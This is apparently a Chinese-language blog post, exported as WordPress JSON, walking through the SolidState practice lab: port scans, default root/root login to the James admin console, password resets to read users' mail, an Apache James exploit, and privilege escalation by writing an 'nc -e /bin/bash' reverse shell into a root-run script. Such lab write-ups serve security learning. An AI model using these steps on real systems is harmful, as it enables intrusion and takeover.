{"id":222,"date":"2024-04-22T12:13:47","date_gmt":"2024-04-22T04:13:47","guid":{"rendered":"http:\/\/xiyu12.top\/?p=222"},"modified":"2024-04-22T12:13:47","modified_gmt":"2024-04-22T04:13:47","slug":"solidstat","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=222","title":{"rendered":"solidstat"},"content":{"rendered":"\n

\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/p>\n\n\n\n

sudo nmap -sn 192.168.1.0\/24 \u5f97\u5230\u76ee\u6807\u4e3b\u673a 192.168.1.132<\/p>\n\n\n\n

sudo nmap -sT –min-rate 1000 -p- 192.168.1.132 <\/p>\n\n\n\n

Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-22 12:00 CST\nNmap scan report for 192.168.1.132\nHost is up (0.0037s latency).\nNot shown: 65529 closed tcp ports (conn-refused)\nPORT     STATE SERVICE\n22\/tcp   open  ssh\n25\/tcp   open  smtp\n80\/tcp   open  http\n110\/tcp  open  pop3\n119\/tcp  open  nntp\n4555\/tcp open  rsip\nMAC Address: 00:0C:29:2B:CB:BD (VMware)\n\nNmap done: 1 IP address (1 host up) scanned in 4.80 seconds<\/code><\/pre>\n\n\n\n
sudo nmap -sC -sV -p 80,22,25,110,119,4555 192.168.1.132<\/p>\n\n\n\n
PORT     STATE SERVICE     VERSION\n22\/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)\n| ssh-hostkey: \n|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)\n|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)\n|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)\n25\/tcp   open  smtp        JAMES smtpd 2.3.2\n|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.1.130 [192.168.1.130])\n80\/tcp   open  http        Apache httpd 2.4.25 ((Debian))\n|_http-title: Home - Solid State Security\n|_http-server-header: Apache\/2.4.25 (Debian)\n110\/tcp  open  pop3        JAMES pop3d 2.3.2\n119\/tcp  open  nntp        JAMES nntpd (posting ok)\n4555\/tcp open  james-admin JAMES Remote Admin 2.3.2\nMAC Address: 00:0C:29:2B:CB:BD (VMware)\nService Info: Host: solidstate; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n<\/code><\/pre>\n\n\n\n
sudo nmap –script=vuln -p 80,22,25,110,119,4555 192.168.1.132<\/p>\n\n\n\n
PORT     STATE SERVICE\n22\/tcp   open  ssh\n25\/tcp   open  smtp\n| smtp-vuln-cve2010-4344: \n|_  The SMTP server is not Exim: NOT VULNERABLE\n80\/tcp   open  http\n|_http-dombased-xss: Couldn't find any DOM based XSS.\n| http-sql-injection: \n|   Possible sqli for queries:\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=D%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=M%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=N%3BO%3DD%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=S%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=M%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=S%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=N%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=D%3BO%3DD%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=D%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=M%3BO%3DD%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=S%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=N%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=D%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=M%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=N%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/js\/?C=S%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/?C=M%3BO%3DA%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/?C=N%3BO%3DD%27%20OR%20sqlspider\n|     http:\/\/192.168.1.132:80\/assets\/?C=D%3BO%3DA%27%20OR%20sqlspider\n|_    http:\/\/192.168.1.132:80\/assets\/?C=S%3BO%3DA%27%20OR%20sqlspider\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\n| http-csrf: \n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.132\n|   Found the following possible CSRF vulnerabilities: \n|     \n|     Path: http:\/\/192.168.1.132:80\/\n|     Form id: name\n|     Form action: #\n|     \n|     Path: http:\/\/192.168.1.132:80\/about.html\n|     Form id: name\n|     Form action: #\n|     \n|     Path: http:\/\/192.168.1.132:80\/services.html\n|     Form id: name\n|     Form action: #\n|     \n|     Path: http:\/\/192.168.1.132:80\/index.html\n|     Form id: name\n|_    Form action: #\n| http-enum: \n|   \/README.txt: Interesting, a readme.\n|_  \/images\/: Potentially interesting directory w\/ listing on 'apache\/2.4.25 (debian)'\n110\/tcp  open  pop3\n119\/tcp  open  nntp\n4555\/tcp open  rsip\nMAC Address: 00:0C:29:2B:CB:BD (VMware)<\/code><\/pre>\n\n\n\n
gobuster dir -u http:\/\/192.168.1.132 –wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .txt,.php,.html,.sql<\/p>\n\n\n\n
===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.1.132\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,sql,txt,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 7776]\n\/images               (Status: 301) [Size: 315] [--> http:\/\/192.168.1.132\/images\/]\n\/.html                (Status: 403) [Size: 293]\n\/about.html           (Status: 200) [Size: 7182]\n\/services.html        (Status: 200) [Size: 8404]\n\/assets               (Status: 301) [Size: 315] [--> http:\/\/192.168.1.132\/assets\/]\n\/README.txt           (Status: 200) [Size: 963]\n\/LICENSE.txt          (Status: 200) [Size: 17128]\n\/.html                (Status: 403) [Size: 293]\n\/server-status        (Status: 403) [Size: 301]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n\n\n\n
\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/p>\n\n\n\n
\u5df2\u77e5 80\uff0c25\uff0c110\uff0c119\uff0c4555 \u7aef\u53e3   \u5176\u4e2d  4555 \u7aef\u53e3\u6709\u4e00\u4e2a\u670d\u52a1\u53eb james-admin \u5176\u4ed6\u7684\u7aef\u53e325\uff0c110\uff0c119 \u90fd\u662f\u548c\u5b83\u76f8\u5173\u7684  <\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Apache James \u662f\u4e00\u4e2a\u5f00\u6e90\u7684\u90ae\u4ef6\u670d\u52a1\u5668\u8f6f\u4ef6\uff0c\u5b83\u4f7f\u7528 Java \u7f16\u7a0b\u8bed\u8a00\u5f00\u53d1<\/p>\n\n\n\n
\u90ae\u4ef6\u670d\u52a1\u529f\u80fd<\/strong>\uff1aApache James \u63d0\u4f9b\u4e86\u5b8c\u6574\u7684\u90ae\u4ef6\u670d\u52a1\u529f\u80fd\uff0c\u5305\u62ec SMTP\uff08Simple Mail Transfer Protocol\uff09\u670d\u52a1\u5668\u3001POP3\uff08Post Office Protocol 3\uff09\u670d\u52a1\u5668\u3001IMAP\uff08Internet Message Access Protocol\uff09\u670d\u52a1\u5668\u7b49\u3002\u5b83\u652f\u6301\u53d1\u9001\u548c\u63a5\u6536\u7535\u5b50\u90ae\u4ef6\uff0c\u7ba1\u7406\u7528\u6237\u90ae\u7bb1\uff0c\u5904\u7406\u90ae\u4ef6\u4f20\u8f93\u7b49\u529f\u80fd<\/p>\n\n\n\n
\u641c\u7d22\u53ef\u4ee5\u5f97\u5230\u4e00\u4e2a \u5f31\u5bc6\u7801  root\/root    \u4f7f\u7528pop3 \u767b\u9646\u67e5\u770b\u4e00\u4e0b \u90ae\u4ef6   \u53d1\u73b0\u5931\u8d25<\/p>\n\n\n\n
telnet 192.168.1.132 110\nuser root\npass root<\/code><\/pre>\n\n\n\n
\u5c1d\u8bd5\u767b\u9646\u4e00\u4e0b 4555 \u7684james \u540e\u53f0<\/p>\n\n\n\n
nc 192.168.1.132 4555\nroot\nroot\n\u4f7f\u7528  help  \u67e5\u770b\u547d\u4ee4\nlistusers\t                  display existing accounts\nadduser [username] [password]\t  add a new user\ndeluser [username]\t          delete existing user\nsetpassword [username] [password] sets a user\u2019s password\n<\/code><\/pre>\n\n\n\n
\u67e5\u770b \u7528\u6237 \u7136\u540e\u5c06\u5bc6\u7801\u6539\u6210 123456  \uff0c\u4f7f\u7528 pop3 \u767b\u9646\u67e5\u770b\u90ae\u4ef6  \u5728\u7528\u6237mindy \u7528\u6237\u4e2d\u53d1\u73b0\u4e86  \u4e00\u4e2a\u51ed\u8bc1\u3002<\/p>\n\n\n\n
\u4f7f\u7528ssh \u767b\u9646  \u83b7\u5f97shell<\/p>\n\n\n\n
\u4e09\u3001\u63d0\u6743<\/p>\n\n\n\n
\u767b\u9646\u53d1\u73b0  shell \u662f rbash  \u4e00\u4e2a\u53d7\u9650\u7684shell\u3002<\/p>\n\n\n\n
rbash\u4e2d\u7684\u9650\u5236\uff08\u6b63\u56e0\u4e3a\u6709\u8fd9\u4e9b\u9650\u5236\u6211\u4eec\u624d\u8981\u7a81\u7834\u5b83\uff09<\/strong><\/p>\n\n\n\n
    \n
  • \u4e0d\u80fd\u4f7f\u7528cd\u547d\u4ee4\uff08\u610f\u5473\u7740\u4e0d\u80fd\u66f4\u6539\u76ee\u5f55\uff09<\/li>\n\n\n\n
  • \u4e0d\u80fd\u8bbe\u7f6e\u6216\u53d6\u6d88\u73af\u5883\u53d8\u91cf\uff1aSHELL\uff0c PATH\uff0c ENV\uff0c BASH_ENV<\/li>\n\n\n\n
  • \u5bfc\u5165\u529f\u80fd\u53d7\u9650<\/li>\n\n\n\n
  • \u6307\u5b9a\u5305\u542b\u53c2\u6570’\/’\u6216’-‘\u7684\u6587\u4ef6\u540d(\u5373\u547d\u540d\u4e2d\u4e0d\u80fd\u5305\u542b ‘\/ ‘ \u6216’-‘)<\/li>\n\n\n\n
  • \u4e0d\u80fd\u4f7f\u7528\u4f7f\u7528 >\uff0c>|\uff0c <>\uff0c >&\uff0c &>\uff0c >> \u7b49\u91cd\u5b9a\u5411\u64cd\u4f5c\u7b26<\/li>\n\n\n\n
  • \u4e0d\u80fd\u4f7f\u7528’set + r’\u6216’set + o’\u5173\u95ed<\/li>\n<\/ul>\n\n\n\n
    \u540c\u65f6 \u53ef\u4ee5\u4f7f\u7528\u7684\u547d\u4ee4\u53ea\u6709ls  cat  <\/p>\n\n\n\n
    \u53ea\u6709\u5148\u60f3\u529e\u6cd5\u7ed5\u8fc7  \u8fd9\u4e2a\u53d7\u9650shell  \u83b7\u5f97\u4e00\u4e2a\u6b63\u5e38\u7684bash<\/p>\n\n\n\n
    \u8fd9\u65f6\u6211\u4eec\u81ea\u7136\u60f3\u5230\u4e4b\u524d\u641c\u7d22\u5230\u7684 \u5173\u4e8eApache James \u7684\u6f0f\u6d1e  \u8fd9\u4e2a\u6f0f\u6d1e\u53ef\u4ee5\u6267\u884c\u547d\u4ee4  \u6267\u884c\u4e00\u4e2a\u53cd\u5f39shell\u7684\u547d\u4ee4 \u770b\u662f\u5426\u53ef\u4ee5\u7ed5\u8fc7\u3002<\/p>\n\n\n\n
    searchsploit james-admin  #\u67e5\u627e\u6709\u5173\u6f0f\u6d1e\nsearchsploit -m   xxxx.py  #\u4e0b\u8f7dexploit\u811a\u672c\npython3 xx.py  192.168.1.132 192.168.1.130 1234  #\u8fd0\u884c\u811a\u672c\nnc -lvp 1234                #\u63a5\u53d7\u53cd\u5f39\nssh mindy@192.168.1.132                      #\u89e6\u53d1\u6761\u4ef6\u662f\u5fc5\u987b\u6709\u4e00\u4e2a\u7528\u6237\u767b\u9646\u3002\u4f7f\u7528ssh\u767b\u9646\u89e6\u53d1\n<\/code><\/pre>\n\n\n\n
    \u83b7\u5f97\u4e00\u4e2a\u6b63\u5e38\u7684\u53cd\u5f39shell<\/p>\n\n\n\n
    \u6ce8\u610f \uff1a  \u4f7f\u7528 find \/ -writable -type f 2>\/dev\/null   | grep -v \/proc  | grep -v \/sys<\/p>\n\n\n\n
    \u627e\u5230\u4e00\u4e2a  \u53ef\u4ee5\u5199\u5165\u7684\u9ad8\u6743\u9650\u7684\u6587\u4ef6  tmp.py<\/p>\n\n\n\n
    \u5199\u5165\u53cd\u5f39sehll<\/p>\n\n\n\n
    import os\nos.system('nc -e \/bin\/bash 192.168.1.130 5555');\nnc -lvp 5555<\/code><\/pre>\n\n\n\n
    \u83b7\u5f97root shell\n\u63d0\u6743\u6210\u529f<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
    \u4e00\u3001\u4fe1\u606f\u6536\u96c6 sudo nmap -sn 192.168.1.0\/24 \u5f97\u5230\u76ee\u6807\u4e3b\u673a 192.168.1.13 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[19,73],"class_list":["post-222","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-apache-james","tag-rbash"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/222","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=222"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/222\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=222"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=222"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=222"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}